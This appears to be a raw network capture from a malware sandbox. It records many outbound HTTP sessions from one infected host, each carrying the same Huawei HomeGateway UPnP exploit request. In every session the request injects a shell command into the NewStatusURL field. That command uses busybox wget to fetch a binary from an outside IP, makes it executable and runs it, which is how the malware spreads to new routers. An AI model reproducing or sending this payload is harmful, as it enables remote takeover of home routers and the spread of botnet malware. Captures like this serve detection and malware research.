                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1121192.168.2.154318041.234.7.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173924923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1122192.168.2.154215641.18.172.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173955917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1123192.168.2.154818441.222.251.14337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174026012 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1124192.168.2.154762841.58.69.7037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174041033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1125192.168.2.153747041.16.14.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174055099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1126192.168.2.155737041.33.249.22737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174115896 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1127192.168.2.155144041.33.162.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174115896 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1128192.168.2.154039241.197.193.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174143076 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1129192.168.2.154719441.156.132.24437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174170017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1130192.168.2.155725041.8.0.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.174220085 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 